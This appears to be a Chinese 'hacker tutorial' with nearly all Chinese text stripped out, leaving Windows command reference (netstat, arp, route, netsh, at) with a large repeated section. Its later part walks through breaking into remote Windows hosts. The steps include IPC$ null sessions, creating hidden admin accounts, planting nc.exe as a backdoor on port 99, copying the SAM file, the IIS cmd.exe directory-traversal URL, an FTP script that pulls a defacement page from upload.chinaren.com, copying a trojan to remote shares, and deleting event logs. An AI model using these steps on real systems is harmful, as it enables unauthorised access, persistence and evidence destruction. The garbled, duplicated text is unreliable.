黑客教程

1
Cracker Hacker

rfc

IP

1
2
3
4
5

ftppingnet
tcp/ip
C asp cgi
htm
phpjava

C htm
wuftpApache
QQ QQ
3windows
4 CMD ASP PHP JAVA
5 BBS X
6
**
**
7
8 QQ
9
10
()
1 IPC
windows
2 windows ,windows
3basic ,,
4 (, ),
sql NBSI.
,,
windows
,.
........ ,
2000 (),
,
().
,., Di~~~
,....:
,, blog,,,(
),.
.
: ( :windows2000 ,VPN
,windows_HOME XP "" IIS......)
E
3
1:cmd
2cmd
.bat
:cmd,
IPC$
cmd
cmd
cmd and
cmd "/?" ping ping /?
google
google
pass:^_^
Enjoy it !
4
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib
fdisk date label defrag
msd path share memmaker
help restore set time

tree debug doskey DOS prempt
undelete scandisk
DOS
diskcomp append
expand DOS fasthelp
fc interink
setver intersvr
subst qbasic Basic
vsafe unformat
ver DOS smartdrv
vol lh
ctty emm386
:
Dir
? **
*.
., dir *.exe
dir .exe
/p
/w
5
/s
win
dir *.* -> a.txt a.txt

dir *.* /s -> a.txt a.txt
Attrib

attrib
+r
-r
+a
-a
+s
-s
+h
-h
Cls
Exit
format
/q
/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP
/all
TCP/IP
ipconfig
winipcfg ME98 95 Windows XP

winipcfg IP

IP
TCP/IP DHCP IP (APIPA)
md
Move
Nbtstat
TCP/IP (NetBT) NetBIOS
NetBIOS NetBIOS Nbtstat NetBIOS

Windows Internet (WINS) nbtstat
Nbtstat
-a remotename
NetBIOS RemoteName
NetBIOS
-A IPAddress
NetBIOS IP
Netstat
TCP IP IPv4
IPICMPTCP UDP IPv6
IPv6ICMPv6 IPv6 TCP

IPv6 UDP netstat TCP
-a
TCP TCP UDP
Ping
(ICMP)
TCP/IP
IP
Ping TCP/IP
ping Ip
-t
ping
CTRL-BREAK ping CTRL-C
-lSize

32size 65,527
Rename (Ren)
ren *.abc *.cba

Set
set
Shutdown
shutdown
-m ComputerName
-t xx
xx 20
-l
-m ComputerName
-s
-r

-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow
/scanonce
/purgecache
Windows
/cachesize=x
Windows MB
type
type
bat
Tree
Xcopy
/s
/sxcopy
/e
copy
del
ftp bat net telnet
1.
ping 192.168.10.88 t t
2.DNSIPMac
A.Win98winipcfg
B.Win2000 Ipconfig/all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.
Net send
/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP
6. arp
IP MAC
arp -a
7.
IP MAC IP
ARP s 192.168.10.59 0050ff6c0875
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view
IP
C:\>net view 192.168.10.8
192.168.10.8

------------------------------------- Disk
B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session
C:\>net session

------------------------------------------------------------------------------\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S
11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\net share mymovie=e:\downloads\movie /users:1
mymovie
1
12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP
IP
arp
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
-a [InetAddr] [-N IfaceAddr]

ARP IP ARP
InetAddr
arp -a
InetAddr IP
ARP -N IfaceAddr
IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a
-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr
IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]
ARP IP InetAddr EtherAddr
ARP IfaceAddr
IfaceAddr IP
/?
InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp
""
(TCP/IP)
ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
at
" "
at
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]

at
[[\\ComputerName]
hours:minutes
[/interactive]
[{/every:date[,...]|/next:date[,...]}] command]
\\computername
at
ID
/delete
ID
/yes
""
hours:minutes
24
00:00 [] 23:59 :
/interactive
command , command
/every:
command
date
MTWThFSSu 1 31
date at
/next:
command
command
Windows
.exe .com .bat

.cmd
(UNC)
/?
Schtasks at
schtasks at
schtasks "
"
at
at Administrators
Cmd.exe
At Cmd.exe
(.exe) Cmd.exe
cmd /c dir > c:\test.out
at
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file

OK 3 Each F 11:59 PM backup2.bat
(ID)
(ID) at
Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"
"
at
(>)
at
(^) Output.text
at 14:45 c:\test.bat ^>c:\output.txt
systemroot
at
at at
" "
" "
UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at
Marketing
at \\marketing
Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports
>> \\maintenance\reports\corp.txt"
Marketing
Archive.cmd
at \\marketing 00:00 /every:5,10,15,20,25,30 archive

at
at /delete
(.exe)
cmd /c Cmd.exe
14.Rsh
RSH Windows XP Windows 2000
RSH Windows 2000 Server Resource Kit Rshsvc.exe
RSH
rsh
rsh [Host] [-l UserName] [-n] [Command]
Host
command
-l UserName
-n
rsh NULL
Command
/?
rsh command
command
command Rsh
">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile
Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional

rsh
.rhosts
.rhosts UNIX
.rhosts
.rhosts
rcprexec rsh
.rhosts
(#)
host7 #This computer is in room 31A
.rhosts
.rhosts
(TCP/IP)
admin1
vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX
tftp [-i] [Host] [{get | put}] [Source] [Destination]
-i
-i
ASCII (EOL)
Host
put
Destination Source
TFTP

get
Destination Source
Source
Destination
Destination Source
/?
get
FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000
(TCP/IP)
Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat

nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [s] [-S] [Interval]
-a remotename
NetBIOS RemoteName
NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP
WINS
-R
NetBIOS Lmhosts
#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat
/?
Nbtstat
Nbtstat
Input
Output
In/Out
Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type
Status NetBIOS ""
""
State NetBIOS
NetBIOS

IP

IP
TCP
(TCP/IP)
NetBIOS
CORP07
NetBIOS
nbtstat -a CORP07
IP 10.0.0.99
NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts
#PRE
nbtstat -R
WINS NetBIOS
nbtstat -RR
5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4
IPICMPTCP UDP IPv6
IPv6ICMPv6 IPv6 TCP

netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
-a
TCP TCP UDP
-e
-s
-n
TCP
-o
TCP
ID (PID) Windows
"
"
PID -a-n -p
-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6
IPv6
TCPIPv6 UDPICMPv6 IPv6
-p
-r
IP route print
Interval
Interval CTRL+C
netstat
/?
(-) (/)
Netstat
Proto
TCP UDP
Local Address
IP -n IP
*

Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
TCP RFC 793
(TCP/IP)
netstat -e -s
TCP UDP
netstat -s -p tcp udp
5 TCP
ID
nbtstat -o 5
TCP
ID
nbtstat -n -o
18.Runas
runas
[{/profile|/noprofile}]
[/env]
[/netonly]
[/smartcard]
[/showtrustlevels] [/trustlevel] /user:UserAccountName program
/profile
/profile
/no profile
/noprofile
/env
/netonly
/smartcard
/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels
/user:UserAccountName

user@domain domain\user
/user
/?
runas
runas "
"
runas Administrator Administrator
runas MMC
"
"
Administrator /user:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC
"
""Users""Power Users"
runas MMC "
"
MMC "
".
runas
runas MMC "
"
"
" Windows 2000

runas
runas
RunAs RunAs
"
"
""""
Windows 2000
runas /user:localmachinename\administrator cmd
companydomain\domainadmin "
"
runas /user:companydomain\domainadmin "mmc
%windir%\system32\compmgmt.msc"
domain.microsoft.com user ""
runas /user:user@domain.microsoft.com "notepad my_file.txt"
MMC
runas /netonly /user:domain\username "command"

domain\username
19.Route
IP route
route
[-f]
[-p]
[Command
[Destination]
[mask
Netmask]
[Gateway] [metric Metric]] [if Interface]]
-f
255.255.255.255
127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0
addchange delete
-p
add TCP/IP
IP TCP/IP print
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Par
ameters\PersistentRoutes
Command

add
change
delete
print
Destination
IP
0 IP
0.0.0.0
mask subnetmask
IP 255.255.255.255
0.0.0.0 255.255.255.255
0 1
Gateway
IP IP
IP
metric Metric
1 ~ 9999
if Interface
route print
0x if

/?
TCP/IP LAN IP
LAN
TCP/IP
systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)
(?)
10.*.1, 192.168.* 127.* *224*
"Route:bad
gateway address netmask" 1
1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p
Windows 95 Windows 98 route
(TCP/IP)
IP
route print
IP
10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0
IP
10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
windowsserver cmd ip -> Windows 2k/2003
Server
ip
Windows2000
Unix ip
C:\>ipconfig (ipconfig ip )
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111
255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS
IPCONFIG
C:\>ipconfig ipconfig
,
Ethernet adapter :
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
..-
? -
aaaa - àaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'
dump -
exec -
exit -
help -
interface - ìnterface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'
set -
show -
unalias -
wins - `wins'
IP

IP Win2000 IP Win98
IP
IP
?
Win2000 netsh
" "
"cmd" netsh
netsh
int ip
IP dump IP
C:\Documents and Settings\Administrator>netsh

netsh>
netsh>int ip
interface ip>dump
# ---------------------------------# IP
# ---------------------------------pushd interface ip
# IP
set address name =
source = static addr =
192.168.0.5 mask = 255.255.255.0

set address name = gateway = 192.168.0.2 gwmetric
=1
set dns name = source = static addr = 61.237.17.181
add dns name = addr = 211.97.168.129
add dns name = addr = 211.98.4.1
set wins name = source = static addr = none

# 2 IP
set address name = 2 source = dhcp
set dns name = 2 source = dhcp
set wins name = 2 source = dhcp
popd
# IP
IP 2
netsh IP "set
address name = source=static
addr=IP mask="
netsh IP 192.168.0.7
255.255.255.0
netsh>int ip
interface ip>set address name =" "source = static addr
= 192.168.0.7 mask = 255.255.255.0
interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000
IP IP
int ip
set address name= source=static addr=192.168.0.7
mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig
IP
"7.bat" "netsh exec

7.sh" IP
192.168.0.5192.168.0.7
IP
"addr" IP
172.19.96.7
IP
int ip
set address name = source = static addr= 172.19.96.7
mask = 255.255.255.0
=1
ipconfig/all
IP ?
netstat
netstat TCP/IP netstat -a
netstat -r netstat -e
Ethernet
netstat -s netstat -n
Tracert IP
Tracert IP (TTL) ICMP
-d IP
-h maximum_hops target_name
-j host-list Tracert
-w timeout timeout
target_name IP
pathping
ping tracert
pathping
-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries
-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2
-T
(QoS)
-R RSVP test Che "

(RSVP)" -R

(QoS)
DHCP

netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address
" servername
"
DHCP Netshell
/? help
DHCP list DHCP
Netshell
route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary
routing ip add/set ipiptunnel IP

IP
routing ip add/delete/set/show rtmroute
routing ip add/delete/set/show persistentroute
routing ip add/delete/set/show preferenceforprotocol
routing ip add/delete/set/show scope

routing ip set/show loglevel IP
routing ip show helper IP Netsh
routing ip show protocol IP

routing ip show mfe
routing ip show mfestats
routing ip show boundarystats IP
routing ip show r*estinations
routing ip show rtmroutes
routing ip nat set/show global (NAT)
routing ip nat add/delete/set/show interface

NAT
routing ip nat add/delete addressrange NAT

routing ip nat add/delete addressmapping NAT
routing ip nat add/delete portmapping NAT
routing ip autodhcp set/show global DHCP
routing ip autodhcp set/show interface

DHCP
routing ip autodhcp add/delete exclusion DHCP
routing ip dnsproxy set/show global DNS
routing ip dnsproxy set/show interface DNS
routing ip igmp set/show global IGMP

routing ip igmp add/delete/set/show interface
IGMP
routing ip igmp add/delete staticgroup
routing ip igmp show grouptable IGMP
routing ip igmp show ifstats IGMP
routing ip igmp show iftable IGMP
routing ip igmp show proxygrouptable IGMP
IGMP
routing ip igmp show rasgrouptable

Internet
routing ip ospf set/show global OSPF

routing ip ospf add/delete/set/show interface
OSPF
routing ip ospf add/delete/set/show area
OSPF
routing ip ospf add/delete/show range OSPF

routing ip ospf add/delete/set/show virtif
OSPF
routing ip ospf add/delete/show neighbor
OSPF
routing ip ospf add/delete/show protofilter
OSPF
routing ip ospf add/delete/show routefilter
OSPF
routing ip ospf show areastats OSPF
routing ip ospf show lsdb OSPF

routing ip ospf show virtifstats OSPF
routing ip relay set global "DHCP "
routing ip relay add/delete/set interface
"DHCP "
routing ip relay add/delete dhcpserver DHCP
DHCP IP
routing ip relay show ifbinding IP
routing ip relay show ifconfig "DHCP
"
routing ip relay show ifstats DHCP
routing ip rip set/show global IP RIP

routing ip rip add/delete/set/show interface
IP RIP
routing ip rip add/delete peerfilter RIP
routing ip rip add/delete acceptfilter

RIP
routing ip rip add/delete announcefilter
RIP
routing ip rip add/delete/show neighbor RIP
routing ip rip set/show flags IP RIP

routing ip rip show globalstats RIP
routing ip rip show ifbinding IP

routing ip rip show ifstats RIP
IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP
routing ipx add/set filter IPX

routing ipx add/set interface IPX
IPX
routing ipx set global IPX
routing ipx rip add/set filter RIP
routing ipx rip set global IPX RIP
routing ipx rip set interface IPX RIP
routing ipx sap add/set filter SAP
routing ipx sap set global IPX SAP
routing ipx sap set interface IPX SAP
routing ipx netbios add nbname NETBIOS IPX
NetBIOS
routing ipx netbios set interface IPX
NetBIOS
WINS NetSh
list WINS
dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check
database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS
init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset
statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
autopartnerconfig /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""
set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database
show database /?
show info show info /?
show name show
name /?
show partner """"
""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show
statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface
interface set/show credentials
1NET
IP IPC$
hbx 123456 IP 127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx null
net use \\127.0.0.1\ipc$ /delete

net share net
share me=c:\winnt\system32
me winnt
system32 win2000
net
share me /delete
..
SA .
heibai
lovechina
net user heibai lovechina /add
Administrator
.
net localgroup Administrators heibai /add
\* C .
C \* Z .
net use z:\\127.0.0.1\c$
net start telnet
TELNET .
Guest
guest NT
2000
net user guest /active:yes( :
guest )
net user guest /active:no guest
guest lovechina
net user guest lovechina
net localgroup administrators guest /add

guest administrator
net net view
net user
net user
/delete ,,
, net
localgroup
administrators , administrator

net user
administrator
del................
2:at

AT
net time \\127.0.0.1

12:1
ID=1
at \\127.0.0.1 12:3 nc.exe
NC.EXE.
NCNC NETCAT .
TELNET
99.
12:3
99
..
at ,
:
C:\> AT 22:30 Start C:\prettyboy.mp3
ID = 1 [
22:30
]
3:telnet
.
telnet 127.0.0.1 99
99
.
.
4:FTP
, FTP ,
,, WWW.51.NET,.,,
FTP .
FTP WWW.51.NET,
HUCJS,
654321
ftpwww.51.net
,.
---------------------, INDEX.HTM, C:\, D:\
get c:\index.htm d:\
C INDEX.HTM,
D
put c:\index.htm d:\
5:copy
IPC$
C index.htm 127.0.0.1 C
copy index.htm \\127.0.0.1\c$\index.htm
D C D
copy index.htm \\127.0.0.1\d$\index.htm
WINNT
copy index.htm \\127.0.0.1\admin$\index.htm
admin$ winnt
NT
x:\winnt\repair\sam._ sam._
127.0.0.1 C
copy \\127.0.0.1\admin$\repair\sam._ c:\
6set

80 SET
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= IP IP
HTTP_ACCEPT_ENCODING=gzipdeflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows
98;
DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot
PATH_TRANSLATED= E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86
Family
Model
Stepping
3GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0 IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
100% DIR
XX.XX.XX.XX/ XX.XX.XX.XX
7nbtstat
NT 136 139
netbios
NT
nbtstat -A XX.XX.XX.XX
-A
net use \\ IP
net view \\ IP
net use X: \\IP\ \* X
139
netstat -n
----------------
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------Registered
Registered
Registered
Registered
Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
Registered
Registered

<03> .
PENTIUMII
03 :MAC IP
8Shutdown
NT
Shutdown \\IP t:20
20 NT
Telnet
shutdown -m \\
9DIR
10echo
Unicode

index.htm 2
echo >index.htm
echo >>index.htm
index.htm
index.htm

index.htm
>> >
2echo txt chinren

open upload.chinaren.com
FTP
cnhack
test
get index.htm c:\inetpub\wwwroot\index.htm
index.htm
c:\inetpub\wwwroot\index.htm
bye FTP 98 DOSEXIT DOS
echo open upload.chinaren.com> c:\cnhack.txt

echo cnhack >> c:\cnhack.txt
echo 39abs >> c:\cnhack.txt
echo
get
index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
ftp -s:c:\cnhack.txt
ftp -s
cnhack.txt
del c:\cnhack.txt
11:attrib
attrib -r index.htm
index.htm
-+
---------------------attrib +r index.htm
index.htm
12:del
127.0.0.1
NT
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
NT
D C
6
1
net use \IPipc$ "" /user:""
ipc$
NT
everyone 2000
2. IPC$
1. nt/2000/xp ipc$ 98/me
2. net use \ IPipc$ " "

/user:"
"
""
3
5
51Windows :
53
ip lanmanserver

67
lanmanworkstation ipc$
1219
ipc$
1326
1792
NetLogon
2242
4 ipc$
shell
5 IPC$
ipc$ shell sql cmd telnet
shell admin
shell net share ipc$

ipc$ipc$
net
6
net use z: \ IPc$ "" /user:"
" c z
ipc$ IP $ copy
muma.exe \IPd$pathmuma.exe
net use y: \IPd$ copy muma.exe y:pathmuma.exe
""
7 ipc$
net use \IPipc$ /del ipc$
net use z: /del z
net use * /del y
8 ipc$
ipc$
pstools
Win2000SrvReskittelnethack
tftpftp dwrccVNCRemoteAdmin
2000server
9 ips$
A ipc$
1
net share ipc$ /del
net share admin$ /del
net share c$ /del
regedit
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]
RestrictAnonymousDWORD00000002
3
server
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanSe
rverParameters] AutoShareServerDWORD:00000000
pro
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanSe
rverParameters] AutoShareWksDWORD:00000000
B ipc$
net stop lanmanserver
XXX
lanmanserver y
C ipc$
ipc$
D
7
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib
fdisk date label defrag
msd path share memmaker
help restore set time

tree debug doskey DOS prempt
undelete scandisk
DOS
diskcomp append
expand DOS fasthelp
fc interink
setver intersvr
subst qbasic Basic
vsafe unformat
ver DOS smartdrv
vol lh
ctty emm386
:
Dir

? **
*.
., dir *.exe
dir .exe
/p
/w
5
/s
win
dir *.* -> a.txt a.txt

dir *.* /s -> a.txt a.txt
Attrib
attrib
+r
-r
+a
-a
+s
-s
+h
-h

Cls
Exit
format
/q
/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP
/all
TCP/IP
ipconfig
winipcfg ME98 95 Windows XP

winipcfg IP

IP
TCP/IP DHCP IP (APIPA)
md
Move
Nbtstat

Nbtstat
-a remotename
NetBIOS RemoteName
NetBIOS
-A IPAddress
NetBIOS IP
Netstat
TCP IP IPv4
IPICMPTCP UDP IPv6
IPv6ICMPv6 IPv6 TCP

-a
TCP TCP UDP
Ping
(ICMP)
TCP/IP
IP
Ping TCP/IP
ping Ip
-t
ping
CTRL-BREAK ping CTRL-C
-lSize

32size 65,527
Rename (Ren)
ren *.abc *.cba

Set
set

Shutdown
shutdown
-m ComputerName
-t xx
xx 20
-l
-m ComputerName
-s
-r
-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow
/scanonce
/purgecache
Windows
/cachesize=x
Windows MB
type
type
bat
Tree

Xcopy
/s
/sxcopy
/e
copy
del
ftp bat net telnet
1.
ping 192.168.10.88 t t
2.DNSIPMac
A.Win98winipcfg
B.Win2000 Ipconfig/all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.
Net send
/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP
6. arp
IP MAC
arp -a
7.
IP MAC IP
ARP s 192.168.10.59 0050ff6c0875
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view
IP
C:\>net view 192.168.10.8
192.168.10.8

--------------------------------------
Disk
B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session
C:\>net session

------------------------------------------------------------------------------\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S
11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\net share mymovie=e:\downloads\movie /users:1
mymovie
1
12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP
IP
arp
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
-a [InetAddr] [-N IfaceAddr]

ARP IP ARP
InetAddr
arp -a
InetAddr IP
ARP -N IfaceAddr
IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a
-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr
IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]
ARP IP InetAddr EtherAddr

ARP IfaceAddr
IfaceAddr IP
/?
InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp
""
(TCP/IP)
ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
at
" "
at
at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]

at
[[\\ComputerName]
hours:minutes
[{/every:date[,...]|/next:date[,...]}] command]
\\computername
[/interactive]
at
ID
/delete
ID
/yes
""
hours:minutes
24
